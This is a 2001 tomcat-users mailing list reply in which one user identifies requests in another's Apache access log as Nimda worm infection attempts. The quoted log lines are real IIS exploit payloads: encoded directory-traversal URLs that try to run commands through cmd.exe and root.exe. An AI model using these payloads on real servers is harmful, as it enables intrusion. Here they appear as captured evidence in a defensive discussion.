tomcat-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Peter M. Nielsen" <...@ifka.dk>
Subject RE: Apache access.log - (whats going on)
Date Wed, 10 Oct 2001 10:13:29 GMT
Well, someone is trying to get the Nimda-virus to infect your machine.
Hopefully you're running a linux-thang

- Peter

Institut for Konjunktur-Analyse
Aabenraa 29 * DK-1124 KĂžbenhavn K
phone: (+45) 33 32 82 70 * fax: (+45) 33 93 03 67 * http://www.ifka.dk

> -----Original Message-----
> From: Lars Nielsen Lind [mailto:moonie@worldonline.dk]
> Sent: 10. oktober 2001 08:20
> To: tomcat-user@jakarta.apache.org
> Subject: Apache access.log - (whats going on)
>
>
> Hi.
>
> I have read my access.log (apache) and found several IP's as
> shown below. Whats going on?
>
> /Lars Nielsen Lind
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+
> dir HTTP/1.0" 404 326 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+
> dir HTTP/1.0" 404 326 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
> ./winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404
> 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400
> 292 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 309 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
>
>
>


Mime
View raw message